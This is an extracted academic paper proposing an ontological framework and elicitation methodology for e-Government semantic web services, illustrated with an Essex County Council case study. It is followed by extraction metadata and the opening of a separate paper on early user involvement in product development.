Centrality of Mediation. As a complementary design principle to strict decoupling, mediation addresses the handling of heterogeneities that naturally arise in distributed environments. Heterogeneity can occur in terms of data or process. WSMO recognizes the importance of mediation for the successful deployment of Web services by making mediation a first class component of the framework.
Ontological Role Separation. User requests are formulated independently of (in a different context than) the available Web services. The underlying epistemology of WSMO differentiates between the desires of users or clients and available Web services. This complies with our multi-viewpoint approach around the concept of life event.
Service versus Web service. A Web service is a computational entity which is able (by invocation) to achieve a goal. A service in contrast is the actual value provided by this invocation. Thus, WSMO does not specify services, but Web services which are actually means to buy and search services. This complies with our clear separation between the description of Web services and the context of e-Government service-supply where Web services are used.
The main components of WSMO are Ontologies, Goals, Web Services and Mediators.
Goals represent the objectives that users would like to achieve via a Web Service (WS). The WSMO definition of goal describes the state of the desired information space and the desired state of the world after the execution of a given WS. A goal can import existing concepts and relations defined elsewhere, by either extending or simply re-using them as appropriate.
Web Service descriptions describe the functional behavior of an actual WS. The description also outlines how Web Services communicate (choreography) and how they are composed (orchestration).
Mediators define mappings between components: for instance, a goal can be related to one or more web services through mediators. They facilitate the clear-cut separation of different interoperability mechanisms.
Ontologies provide the basic glue for semantic interoperability and are used by the three other components.
Mapping the Conceptual Model: the Ontological Framework
As the e-Government field involves several aspects, we do not refer to a unique conceptual model. Our work is founded on existing – and in some cases well known – conceptual models that define the elements of a government service-supply scenario, specify the actors and roles of an e-Government application, introduce the life event metaphor as the base for a multi-viewpoint approach, and describe the aspects of the e-Government business processes. The main elements described by these conceptual models are combined and mapped into a sound ontological framework. The latter introduces the following two clean separations.
(i) Context vs SWS. We distinguish between the description of the environment where the services are provided, used, and managed by different actors and the SWS’s allowing the automatic discovery, composition, mediation, and execution of services. The former maps the e-Government application entities and requirements, and, particularly, the aspects that cannot be captured by SWS’s such as interaction with non software agents, multiple viewpoints, distinct infrastructure to represent knowledge internally, negotiation between user and provider. It represents input for the latter that completes the scenario with the technical description of computable entities that are able to achieve a goal. This
separation allows the integration of SWS standards and e-Government applications without affecting SWS standards.
(ii) Context vs Vocabulary. We distinguish between descriptive entities (independent views on a scenario by different involved actors) and the actual objects they act upon (representing the vocabulary of different involved actors). This separation allows to adopt distinct – and in some cases already existing – vocabularies for multiple viewpoints.
Figure 2 depicts the architecture of our framework and its three meta-ontologies.
Core Life Event Ontology (CLEO) is the heart of our framework allowing the description of the configuration and reconfiguration knowledge by multiple e-Government actors. It represents the contextualization of the scenario.
Service Ontology allows the description of the service delivery knowledge. Based on the above scenario description, developers may provide SWS descriptions addressing integration and interoperability issues; i.e. it completes CLEO by describing Web services and their composition and mediation.
Domain Ontology defines the vocabularies used by multiple actors in the description of their viewpoints. It represents the lexical layer of the framework.
Finally, other ontologies can be imported in order to extend or specialize the conceptual model. For instance, an existing ontology can be used to describe the specific vocabulary of an involved actor.
Core Life Event Ontology (CLEO) is the heart of our framework allowing the description of the configuration and reconfiguration knowledge by multiple e-Government actors. It represents the contextualization of the scenario.
Core Life Event Ontology (CLEO) is the heart of our framework allowing the description of the configuration and reconfiguration knowledge by multiple e-Government actors. It represents the contextualization of the scenario.
CLEO has been designed to be modular. Figure 2 shows the main modules from which it is composed. Every module can be readily extended and freely reused, and deals with one particular aspect of our conceptual model.
Life Event Description Module: it is the heart of CLEO, representing the life events and all actors’ viewpoints that provide a description of them. It adopts the other modules to provide a sound description of the context around the life event.
State of Affair Description Module: gathers the elements (roles, attributes, and parameters) that are relevant in the description of a life event situation.
Conception Description Module: represents the conceptions that actors may describe in their viewpoint related to a specific state of affairs and life event: needs, offers, policies, and legislation.
Plan Description Module: allows the description of the tasks associated with the descriptions of a scenario and the organization into a plan within an actor’s viewpoint.
Interaction Description Module: plays a double role, representing the interactions between two distinct viewpoints, and capturing possible mismatches in the description of exchanged resources. It is the unique module shared between two distinct viewpoints.
Finally, CLEO introduces a knowledge elicitation methodology that first helps domain experts to create a full description of a specific e-Government context using models close to their experience and specific languages of the different involved domains, and then drives the application developers to implement SWS descriptions eventually inferring knowledge from the context description.
The Domain Ontology
The Domain Ontology encodes concepts of the PA domain: organizational, legal, economic, business, information technology and end-user. They are the building blocks for the definition of CLEO and Service Ontology concepts.
Our aim is not to cover all the aspects connected with e-Government. Distinct PA’s could use the same concepts differently or vice-versa adopt distinct terms for the same concept; a single PA may not share the same point of view and have different interoperability needs from other PA’s. Multiple actors can use different vocabularies, also within the same organization. Standardization can help, but it does not necessarily unify the aims and languages of all the involved actors. It is important that every PA (or actor) keeps its autonomy in the description of its own domain (or viewpoint);
this does not affect our ultimate goals of interoperability and integration.
We designed a structure that resides on two level of abstraction: *conceptual* and *instance* level. Figure 3 shows four distinct ontologies (A, B, C, and D) derived from the conceptual level, ending and adapting the existing concepts and relations. They compose the instance level and are independent each other. Each of them describes a particular domain connected to a viewpoint; e.g. legislative terminology, technical terminology of an organization or a field, actor’s language, manager’s tasks, etc.

**Figure 3**: The two-levels structure of the Domain Ontology.
It is important to note that the aim of such a structure is to represent an heterogeneous scenario, and not create mappings between different concepts or solve existing mismatch problems. In our approach these tasks are delegated to the service delivery knowledge level; i.e. at service execution time, when the need for solving a mismatch arises.
**The Service Ontology**
The Service Ontology makes whole the representation of the scenario, modelling the *service delivery knowledge level* by means of the SWS technology. It allows the completion of the descriptions of (i) the services implemented by means of Web services, (ii) the e-Government processes that can be modeled as a composition of Web services (without user interaction), and (iii) the user requests of services. Moreover, it enables the specification of the mechanisms to solve existing mismatch problems at data and process level between distinct viewpoints. In other words, it represents the knowledge useful at runtime.
Because representing SWS’s requires the use of technical concepts, the developers are responsible for the creation of this ontology. Concepts such as precondition, postcondition, grounding, orchestration and choreography of Web services are defined at this level. As we adopt the WSMO approach for SWS’s, and this ontology is composed by three main modules: Goal Ontology, Web Service Ontology, and Mediation Ontology. Note that our work does not consist of improving existing SWS solutions, but enabling their application in the designed ontological framework.
Figure 4 depicts the intersection between the representations of the SWS’s and e-Government applications context provided by the Service Ontology and CLEO, respectively. The two ontologies model two distinct knowledge levels that are provided by distinct kinds of actor, and obviously described by distinct modules. However, they intersect on two concepts: the goal and service descriptions. Such concepts are their points of contact, and, thereby, the way to actualize the integration between SWS and the e-Government application context descriptions. This conceptual overlapping allows the following two integration directions.
*Using SWS descriptions within the context description*: WSMO compliant descriptions of goal and services can be directly adopted within the context description for describing user’s requests and Web services.
*Inferring knowledge from the context for creating SWS descriptions*: the description of the context where the service are supplied may represent the base for the definition of WSMO compliant goal and service descriptions. This also involves the definition of the mediation mechanisms.
To carry out the above integration purposes, we firstly derived the concepts of the Service Ontology from WSMO meta-models and then aligned such concepts to the CLEO meta-models (Figure 5). Axioms and rules enrich the Service Ontology for specifying the above alignment, and describe inference reasonings from CLEO descriptions in order to complete the WSMO compliant descriptions and handle mismatches. The Service Ontology may integrate further SWS approaches, simply adopting the same alignment mechanism.
**A Change of Circumstances Case Study**
We illustrate the elicitation methodology and the main elements of CLEO modules through an e-Government case study within the *change of circumstance scenario*. The prototype is a portal for Essex County Council in the UK (Drumm *et al.* 2005), (Cabral *et al.* 2005), where the following two governmental agencies were involved.
**Community Care (Social Services) in Essex County Council:** they typically have a coordinating role in relation to a range of services from a number of providers and special responsibility for key services such as support for elderly...
and disabled people (day centers, transportation). It uses the SWIFT database as its main records management tool. The Housing Department of Chelmsford District Council: handles housing services and uses the ELMS database.
In this scenario, a case worker of the Community Care department helps a citizen to report his/her change of circumstance (e.g. address) to different agencies involved in the process. In this way, the citizen only has to inform the council once about his/her change, and the government agency automatically notifies all the agencies involved. An example might be when a disabled mother moves into her daughter’s home. The case worker opens a case for a citizen who is eligible to receive services and benefits - health, housing, etc. Multiple service providing agencies need to be informed and interact.
The methodology
The proposed methodology improves the capture of e-Government service-supply scenario requirements and knowledge, in a robust and repeatable manner, whilst also eliciting an awareness of significant facets of the scenario much earlier during the knowledge capture phase.
The modules of CLEO represent the stages of the methodology that have to be followed and define the structure of the knowledge that have to be represented. CLEO indicates how real-life interaction scenarios can be decomposed and translated into models. The Domain Ontology will collect the concepts and terms extracted during the elicitation process, and the Service Ontology will contain the final result of the process: the SWS descriptions.
The methodology is summarized in the following stages:
1. Life event and actor analysis. The e-Government scenario is segmented along two orthogonal dimensions: life events, and actor’s viewpoints. Segmentation allows to focus on a reduced and well-delimited sector of the scenario.
2. Viewpoint analysis. It represents the distribute and cooperative phase. Each identified actor independently defines its viewpoint on the life event. The adequate class life-event-description (user, provider, manager, or politician) has to be adopted for specifying the structure of the viewpoint. The following sub-stages are involved in this phase:
- (a) State of Affair analysis. Main concepts of the domain are modelled as descriptive entities and used to describe the overall scenario of the problem that is being investigated.
- (b) Interaction analysis. All of the interactions between couples of user-provider and provider-provider viewpoints are identified and described by means of the Interaction Description module.
- (c) Conception analysis. The description of the scenario is improved by adding the conceptions (need, offer, policy, legislation) of the actors onto the state of affairs previously defined. In the cases of user and provider viewpoints, the defined conceptions refer to the defined interaction descriptions.
- (d) Plan analysis. Describes the processes and dynamics within the viewpoint. Concepts connected to events and tasks are elicited.
3. Model Specific Scenario. Instances of the descriptions and concepts are created. In this way, the model is tested forcing a set of check axioms and rules to refine the representation.
4. Create the SWS descriptions. The obtained model is used as input of the SWS descriptions provided by developers.
Live event and actor analysis
The first stage is to examine the use case in order to identify the life events within it.
Our approach is based on the life event metaphor, which prompts the supply of services by PA’s. We may simply consider how many different views exist on a life event: the citizen, the PA, the manager, the politician, etc. Life-Event and Life-Event-Description are center concepts of CLEO, respectively referring to the Situation and Description concepts of the D&S ontology.
Currently, we consider four kinds of life event description (user, provider, manager, politician), but further views may be added in the future when extension needs arise.
In the following we list the two life events considered in the case study.
Patient Moves House: A patient of the Social Services notifies that he/she changed address. This event triggers some of the information stored in the SWIFT and ELMS databases, and checking the eligibility of the patient to old and new services and benefits provided by the involved organizations. In case of eligibility of new services, a new patient assessment is necessary.
Patient Passes Away: A patient of the Social Services dies. The date of death should be set in the SWIFT database, and services and benefits have to be canceled.
In the rest of the dissertation, we refer to the first life event. The second stage of this phase is to define the actors that describe their viewpoints. In this case study two public administrations were involved.
**Community Care (Social Services) in Essex County Council:** typically has a coordinating role in relation to a range of services from a number of providers and special responsibility for key services such as support for elderly and disabled people (day centers, transportation). It uses the SWIFT database as its main records management tool.
**The Housing Department of Chelmsford District Council** handles housing services and uses the ELMS database.
Moreover, the end-user is the *case worker* of the Community Care department that helps citizens to report his/her changes of circumstance (e.g., address) to different agencies involved in the process. In this way, the citizen only has to inform the council once about his/her change, and the government agency automatically notifies all the agencies involved.
### Viewpoint analysis
At this stage, we devise three teams for creating three descriptions according to their viewpoints: one user description for representing user requests, and two provider descriptions for representing available services. The three teams work independently building and using the respective lexical layers, and interfacing only to reach an agreement at the Interaction analysis stage. In this way, we can simulate the situation of distributed organizations that, driven by the framework, can autonomously describe their own domain.
Figure 6 shows that, for each domain, we refer to two ontologies: one that will contain the terms associated with the legacy systems (SWIFT, ELMS), and one that will contain other specific terms of the domain. All of the above ontologies will form the instance level of the Domain Ontology (Section ). Without loosing generality, we assume that the case worker and community care viewpoints share the same ontologies.

### State of Affair analysis
The first step of the Viewpoint analysis is to identify the main concepts of the domain, and describe the states of affair where the services are requested and provided within the life event. More than one state of affairs can be identified within a life event: e.g. the initial and the final state of affairs. Each state of affairs defines the involved actors, resources, information, attributes, functional and non-functional parameters, and the relations among them. The concepts identified in this analysis enrich the defined Domain Ontology (Figure 6). On the basis of the descriptive entities used, we distinguish some sub-classes of the State-of-Affair-Description: e.g. *Service-Request*, defining a situation where an applicant requires services; *Processed*, defining a situation where one or more activities have been executed.
In the following, as an example, we summaries the analysis of the *case worker* viewpoint.
A *case worker* is involved in two main situations connected to the patient move house life event: (i) collecting patient information, and notifying his/her change of address; (ii) checking the patient eligibility to old a new services and benefits, and eventually opening a new patient assessment. These two situations have been mapped onto two couples of initial and final state of affair descriptions: *Change-of-Address* and *New-Patient-Assessment*. The initial ones are descriptions of service-request states of affair, while the final ones are descriptions of processed states of affair.
For instance, the New-Patient-Assessment initial state of affairs describes a situation where a *patient* speaks with a *case worker* of a community care department, and supplies to him/her the *new address* and moving *date* information.
The case worker retrieves more *information about the patient* from the system, and then notify the new data. In this paragraph, italic words represent elicited concepts of the context that have been used to describe the viewpoint.
Note the absence of dynamics in the description. The case worker requires and supplies information, but we do no know when and how.
### Interaction analysis
The Interaction Description Module represents an agreement between user and provider – or provider and provider – viewpoints about how to consume services and exchange resources. It is the unique point of contact: a shared module that represents knowledge crossing multiple viewpoints. It allows the capture of context elements and requirements that cannot be caught in other CLEO modules, but also check the existing ones. The core of the module is the transition-event. It gathers the elements that allow the representation of the involved agents, sequence of transitions, activation state, exchanged resources, and eventual data and process differences between two viewpoints. Because the heterogeneity of different viewpoints, we may expect at least two distinct counterparts of the involved descriptive entities: one (or more) from the domain ontology of the source viewpoint and one (or more) from the domain ontology of the destination viewpoint. This simple mechanism allows data and process mismatches between the shared elements of the two viewpoints. Since the limited space available, we cannot detail all of the aspects connected to the interaction module.
Based on such a module, the present analysis refines the existing descriptions, considering new aspects such as the dynamic of the scenario (i.e. the interaction between viewpoints), the source and the destination of the exchanged resources, the condition for exchanging resources, etc. This
means that elements captured by a viewpoint can be introduced into other viewpoints. The constraints defined in the interaction module impose a rigour check in the definition of the new elements. In particular, they require that concepts playing a state and resource role in a transition should also play a role in a defined state of affair description.
In the patient moves house life event, we described five interactions between the three involved viewpoints: case worker, community care, and housing department. Figure 7 depicts the interaction descriptions linking the three viewpoints. The arrows indicates the direction of the transferred value: single-way arrows represent a communication interaction; double-way arrows represent a transactional interaction.
As an example, we consider the Open-assessment-description. It is a transaction that exchanges values between the case worker and the housing department in order to supply new care equipment to the patient and thus open an assessment. It describes two transition events that respectively represent: (i) a query of the case worker in order to obtain the list of care equipments that a patient can use; (ii) the opening of a new patient assessment based on the available equipments. The two italic words represent the exchanged resources. The activation conditions of the two transitions impose the existence of specific parameters. In particular in the first transition, they require the existence of patient-weigh and patient-impairment attributes. Checking the constraints imposed by the module highlights that domain concepts selected by such descriptive entities do not play a role in the state of affair descriptions of the case worker viewpoint. This leads to the necessity of refining the New Patient Assessment Initial state of affairs (that is the one provided as an example in the previous State of Affair analysis), introducing two new attributes that specialize the descriptive entities patient-information.
The check introduced a shortcoming in the state of affairs analysis. The bug regarded two possible service inputs, and thus the early discovery avoided problems at SWS definition level. For instance, developers could create a goal description using generic information of the patient as inputs and a possible web service that satisfy the goal using weight and impairment information as a goal. This problem could be solved only by introducing complex mediators between the goal and web service descriptions.
Both resource and activation elements select distinct concepts from the two distinct domains. This represents a data mismatching, that will solved later in the Service Ontology with the creation of appropriate OO-mediators.
**Conception analysis**
The conception analysis allows us to describe what an actor may conceive in a particular state of affairs. The conception description is the core of each viewpoint linking together all of the elements. Each viewpoint naturally focuses on different aspects of a life event: the user one includes the description of his/her needs; the provider one defines the offers; the manager one defines the policies that influence the service implementations; the politician one describes the laws that rule the scenario. The user and provider viewpoints represent the configuration knowledge of the scenario. The manager and politician viewpoints represent the re-configuration knowledge. The latter drives the evolution of the scenario. A change in an element of the reconfiguration knowledge level may produce changes in the other elements of the scenario. Changes can be propagated following the chain created by the influences relations that links the conception description elements.
In this case study, we focus on the configuration and service delivery knowledge levels. In the specific cases of user and provider viewpoints, the created need and offer descriptions link to one or more interaction descriptions. Goal and service descriptions represent the decomposition of the conception in active/computable steps that link to specific transitions of the associated interaction description.
A complex service is a service that allows to represent its functional decomposition into sub-services by means of a plan description. Sub-services may be known a-priori – in this case we can speak of composition of services – or their functionalities may be delegated to not known external services by means of a need description – in this case we can speak of integration of services. Actually, a service may be decomposed in terms of service-description or need-description concepts.
As an example we consider the definitions associated with the open-assessment-need defined by the case worker and the open-assessment-offer defined by the housing department. They both refer to the interaction open-assessment-description described in the previous phase. Figure 8 depicts the specific situation we are going to describe. Note that the interaction and conception description modules are tightly connected. The mechanism of need/goal and offer/service decomposition allows to model knowledge at different level of granularity, fitting project-specific requirements, and represent complex interactions that cannot be represented by the current one-shot SWS approaches.
**open-assessment-need:** the case worker needs to open a new assessment, after checking the list of care equipments that are eligible to a patient. It uses the following two goals: list-equipments-goal, and open-assessment-goal. These goals are respectively invocation for the transitions list-equipments-event and open-assessment-event (Fig-
Figure 8: Links between Need and Offer Descriptions through the Interaction Description (gray boxes).
The need description uses the plan open-assessment-need-plan for representing the sequence of the two goals.
open-assessment-offer: the housing department offers to open a new assessment after supplying the list of care equipments that are eligible to a patient. It uses the following two services: list-equipments-service, and open-assessment-service (Figure 8). The former is execution for the transition list-equipments-event; the latter is execution for the transition open-assessment-event.
The service list-equipments-service is a complex service that uses the need description retrieve-list-equipments-need for describing a delegation in terms of the following three goals: finds-items-matching-weight-goal, finds-items-matching-impairment-goal, and list-intersection-goal. The first requires a service that finds care equipments for a patient with a specific weight, the second one finds care equipments for a patient with a specific impairment, and the third one intersects the results of the previous two services. The need description specifies the plan retrieve-list-equipments-need-plan that arranges the three used goals.
Plan analysis
This is the last stage of the viewpoint analysis. Each viewpoint is completed with the description of all of the plans that describe procedures, processes, etc.
In our approach, we take advantage of a number of concepts from the Ontology of Plan, which is a module of Dk&S ontology. It allows the division of tasks into elementary and control and the construction of complex tasks from elementary ones among other features. In other words, we can describe both simple (e.g. workflow) and complex (e.g. scheduling) plans adapting to the needs and skills of the different actors: users, manager, organizations, etc. However, further specific approaches used by involved organizations may be adopted simply extending this module.
The plans organize goals or services within a need or offer description, or need and offer within a life event description (viewpoint). For instance, the plan for the needs of the case worker viewpoint describes the following sequence:
1. Get patient information;
2. Notify change of address;
3. Cancel services;
4. Open assessment.
The sequence represents the four steps that a case worker should follow in order to accomplish all the tasks connected to a patient moves house life event.
As further example, we consider the complex service introduced in the previous phase: list-equipments-service. It delegates its functionalities by means of a need description that contains three goals. Two of them ask for a list of equipments respectively on the basis of client weight and impairment. The third one asks for intersecting the two above lists and can be invoked only after the other two. The associated plan introduces the following couple of control tasks: any-order-task and syncro-task. All of the tasks within this couple of tasks can be executed freely. The syncro-task synchronizes the previous tasks before the execution of the last one. As a result, the plan can be represented as the following sequence:
1. any-order-task
2. finds-items-matching-weight-goal
3. finds-items-matching-impairment-goal
4. syncro-task
5. list-intersection-goal
Model Specific Scenario
Once the generic model has been created, to assess its viability it is tested with some specific scenario. We create instances of the concepts of the Domain Ontology (e.g. the Essex county council, the Chelmsford district council, dummy citizens and case workers, etc.). These instances populate the lexical layer of the ontological framework.
Further instances may specialize all of the descriptions of the context, describing specific cases. These instances are created starting from the lexical layer: we select instances of the Domain Ontology, we create instances of the descriptive entities that are played by such instances, and then we compose them into an instance of a context descriptions. This is a sort of reverse path compared with the one we adopted for eliciting the knowledge. For example, an instance of a viewpoint description (e.g. the case worker viewpoint) is built selecting the instances playing a role in the description (e.g. the Jessica, Robert, Essex etc.), creating the instances of the roles of the description (e.g. jessica-patient, robert-case-worker, essex-county-council, etc.), and finally composing the situation following the defined relations (e.g. jessica-patient speaks with robert-case-worker, etc.). The result is a specific description of a scenario.
The creation of instances is a useful mean for checking the consistency of the created descriptions. Inferences based on the axiom and rules of CLEO can help in the creation of the instances (e.g. we can infer the elements of a transition starting from the defined elements of related state of affairs), as well as identify any lack in the model. This is the second and more accurate check point of the model (the first was the interaction analysis). In fact, we are able to test all the inference paths provided by the axiomatization of CLEO.
Create the SWS descriptions
The model created so far describes the context where the services are requested and provided and the involved concepts (Figure 9). The obtained descriptions may be the input for the creation of WSMO goals and web services.
As an example, we report the definitions of goal, web service, and mediator connected to the open assessment transaction between the case worker and housing department viewpoints.
The first step is to create the WSMO-goal description. The reference goal in the context is the list-services-goal, defined in the case worker viewpoint. Following the defined relations, it is possible to access to its associated state of affair descriptions (New Patient Assessment) and to the specific transition description it is invocation for (list-equipments-resource). The axiomatization allows to obtain the possible inputs and outputs of the WSMO goal simply inferring the description entities defined in the states of affair (initial for inputs, final for outputs) whose counterparts in the Domain Ontology are also counterparts of state or resource elements of the associated transition. The resulted inputs are patient-weight and patient-impairment, while the output is the list of eligibility-equipments.
In this case, the context does not provide any suggestion about specific capabilities for the goal. Neither the state of affair descriptions nor the transition state conditions defines specific constraints – except the existence of the inputs and the outputs, that is implicit with the WSMO goal input and output role definitions.
The second step is to create the WSMO-web-service description. The reference service in the context is the list-services-service, defined in the housing-department viewpoint. Using the same reasoning of the WSMO goal case, we can create the definitions of input and output. The inputs are the client-weight and client-impairment, and the output is the list of eligibility-equipments.
Moreover, we introduce choreography and orchestration descriptions (interfaces). Each transition the service is execution for may be mapped to a choreography guarded transition. The set of all obtained guarded transitions is part of the choreography (other guarded transition can be added by developers for managing more detailed aspects; e.g. errors, acknowledge messages, etc.). In our example, the service description only links to the transition list-equipments-event. From such a transition, we can (i) derive the conditions of the guarded transition, referring to the transition condition list-equipments-state-condition, and (ii) define the call to a function that retrieves the transition resource element list-equipments.
The considered service is a complex service, and hence defines a functional decomposition. The orchestration is based on such a decomposition and can be defined in the format: (Sequence G1 G2 G3 M1 M2), where G1, G2 and G3 represent the goals and M1 and M2 the GG-mediators connecting them (Figure 10).
The last step is the creation of WSMO mediator descriptions. The existence of WG-mediators and OO-mediators is proved by means of axiomatization. The mediator descriptions used in this example (Figure 10) are explained in the following.
Conclusion and Future Work
In this paper, we provide an ontological framework with which most PA’s – or generally organizations – can iden-
ify, from which they can work when designing and delivering e-Government services. This general framework can be adapted and applied as appropriate. We present our requirements and approach in the construction of the conceptual model, and briefly describe the well-known ontologies that are the basis of our framework: WSMO and DOLCE.
The framework is composed by three ontologies – Core Life Event Ontology, Domain Ontology, and Service Ontology – that map a distributed e-Government service-supply scenario where multiple actors are independent nodes describing their own knowledge, and provide mechanisms of knowledge sharing and mismatch resolution.
Our approach allows the contextualization of the e-Government scenario in terms of descriptions. In particular, we introduce the following two separations: Context vs Services and Context vs Vocabulary. The former distinguishes between the description of the environment where the services are provided, used, and managed by different actors, and the description of the actual services that can be invoked. The latter distinguishes between descriptive entities of the context, and the actual objects of the actors’ vocabulary they act upon.
As main result, we describe the Core Life Event Ontology (CLEO) that is the heart of our framework allowing the description of the configuration and re-configuration knowledge levels. It is a big ontology: contains 242 elements among classes, relations, axioms, and rules that compose its 6 modules. Moreover, it refers to specific modules (e.g. Plan Ontology) provided by the D&S ontology. For these reasons, we cannot detail all of the involved aspects in this paper.
We focus on the associated knowledge elicitation methodology that first helps domain experts to create a full description of a specific e-Government context using models close to their experience and specific languages of the different involved domains, and then drives the application developers to implement SWS descriptions inferring knowledge from the context description. To introduce the methodology and associated knowledge structures, we worked out a case study within the change of circumstances scenario.
Further important aspects, simply outlined in this paper, regard the description of the evolution of the scenario based on the politician and manager viewpoints, and the mechanism based on the need/offer and interaction module for describing complex transactions between viewpoints.
Finally, future work will concern the adoption of the ontological framework as the base of a middleware for service-oriented e-Government applications (e.g. Web Portals); i.e. creating the infrastructure for the semantic interoperability.
References
OWL-S Coalition. 2004. OWL-S 1.1 release. Website: http://www.daml.org/services/owl-s/1.1/.
|
{"Source-Url": "http://oro.open.ac.uk/3016/1/KnowledgeModelling.pdf", "len_cl100k_base": 11179, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 40297, "total-output-tokens": 12724, "length": "2e13", "weborganizer": {"__label__adult": 0.00030112266540527344, "__label__art_design": 0.0007042884826660156, "__label__crime_law": 0.0008845329284667969, "__label__education_jobs": 0.0031261444091796875, "__label__entertainment": 0.000171661376953125, "__label__fashion_beauty": 0.0002446174621582031, "__label__finance_business": 0.0018472671508789065, "__label__food_dining": 0.0004203319549560547, "__label__games": 0.0008540153503417969, "__label__hardware": 0.000964641571044922, "__label__health": 0.0008497238159179688, "__label__history": 0.000774383544921875, "__label__home_hobbies": 0.00012022256851196288, "__label__industrial": 0.0005698204040527344, "__label__literature": 0.0005793571472167969, "__label__politics": 0.001476287841796875, "__label__religion": 0.0004143714904785156, "__label__science_tech": 0.255615234375, "__label__social_life": 0.00020647048950195312, "__label__software": 0.09075927734375, "__label__software_dev": 0.6376953125, "__label__sports_fitness": 0.00023353099822998047, "__label__transportation": 0.0009741783142089844, "__label__travel": 0.00033092498779296875}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 60791, 0.00822]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 60791, 0.52178]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 60791, 0.90595]], "google_gemma-3-12b-it_contains_pii": [[0, 87, false], [87, 4508, null], [4508, 10713, null], [10713, 15847, null], [15847, 21929, null], [21929, 26285, null], [26285, 30770, null], [30770, 35396, null], [35396, 41139, null], [41139, 46791, null], [46791, 51999, null], [51999, 55384, null], [55384, 60791, null]], "google_gemma-3-12b-it_is_public_document": [[0, 87, true], [87, 4508, null], [4508, 10713, null], [10713, 15847, null], [15847, 21929, null], [21929, 26285, null], [26285, 30770, null], [30770, 35396, null], [35396, 41139, null], [41139, 46791, null], [46791, 51999, null], [51999, 55384, null], [55384, 60791, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 60791, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 60791, null]], "pdf_page_numbers": [[0, 87, 1], [87, 4508, 2], [4508, 10713, 3], [10713, 15847, 4], [15847, 21929, 5], [21929, 26285, 6], [26285, 30770, 7], [30770, 35396, 8], [35396, 41139, 9], [41139, 46791, 10], [46791, 51999, 11], [51999, 55384, 12], [55384, 60791, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 60791, 0.0]]}
|
olmocr_science_pdfs
|
2024-12-07
|
2024-12-07
|
417990d082ab55f5a6e5de586c86da45ac00191f
|
Kujala, Sari
Effective user involvement in product development by improving the analysis of user needs
Published in:
BEHAVIOUR AND INFORMATION TECHNOLOGY
DOI:
10.1080/01449290601111051
Published: 01/01/2008
Please cite the original version:
https://doi.org/10.1080/01449290601111051
Effective user involvement in product development by improving the analysis of user needs
SARI KUJALA
Helsinki University of Technology, Software Business and Engineering Institute,
P.O. Box 9210, FIN-02015 TKK, Finland; tel. +358 50 3862768, fax +358 9 451 4958
Email: sari.kujala@tkk.fi
User involvement has been shown to be beneficial in the development of useful and usable systems. The trend of software development becoming a product-oriented activity creates challenges to user involvement. Field studies appear a promising approach, but the analysis of the gathered user needs has been shown to be demanding. This study presents, on the basis of seven case studies, an early user-involvement process showing how user needs can be analysed and how the input to product development can be identified. In addition, the process is tested in two industrial cases with interviews and a questionnaire. The results show that the process supports effective early user involvement; the resulted requirements were evaluated as being more successful and their quality as better than average. However, the case studies show that user involvement not only provides useful information about users’ needs but also increases the understanding of users’ values.
Keywords: User involvement, user-centred design, product development, requirements elicitation, user need analysis, field studies
1. Introduction
User involvement is a widely accepted principle in the development of useful and usable software systems (Karat, 1997; Wilson et al., 1997; Bekker and Long, 2000). A lack of user involvement has been repeatedly associated with failed software projects and the benefits of user involvement are shown in several studies (Kujala, 2003, Kujala et al., 2005). However, the mechanism of user involvement, what in fact makes it useful, is not so clearly formulated. There are varied approaches to user involvement and they have different rationales explaining why to involve users. For example, participatory design emphasises democracy and skill enhancement (Ehn, 1993). Other approaches focus mostly on gaining varied information from users. For example, ethnography focuses on the social aspects of human co-operation and user-centred design and contextual design on the context of use.
In addition, software development is increasingly becoming a package- (or product-) oriented activity rather than a custom activity (Carmel and Becker, 1995). Product development contexts and the increasing numbers of users create special challenges to user involvement as Iivari and Iivari (2006) point out. However, participatory design, which is the principal approach to user involvement, focuses mainly on internal or custom development and efforts to adapt the approach to product development have not turned out to be
flawless (Grudin and Pruitt, 2002). Thus, the form and rationale of user involvement need to be reconsidered to fit product development purposes.
The informative role of users is one of the most prevalent rationales for user involvement, as can be seen in Gould and Lewis’ (1985) recommendation that the design team should be brought into direct contact with potential users, as opposed to hearing or reading about them through human intermediaries. In addition, Keil and Carmel (1995) suggest that it is less desirable to use indirect links to customers and users because of the information filtering and distortion that can occur when intermediaries or customer surrogates are used. Nowadays, most usability experts consider it impossible to design a usable product without getting feedback from real users; eliciting user requirements is also recommended (ISO 13407, 1999).
On the other hand, there has been discussion as to whether users should be active co-designers and not be considered informants or mere subjects (Muller et al., 1997; Olsson, 2004). Olsson (2004) points out that if users serve as information sources but have no decision-making rights, they still have little or no influence on design. She presents a qualitative analysis of the contributions to design by user representatives compared with interaction designers. One of the contributions seems to be that users had their own values compared to designers and by active participation they could convey these values and their domain knowledge for use by developers. On the basis of earlier experience, Olsson (2004) states that user representatives concentrate on functionality and effectiveness, in comparison with interaction designers, who spend more time on appearance and presentation.
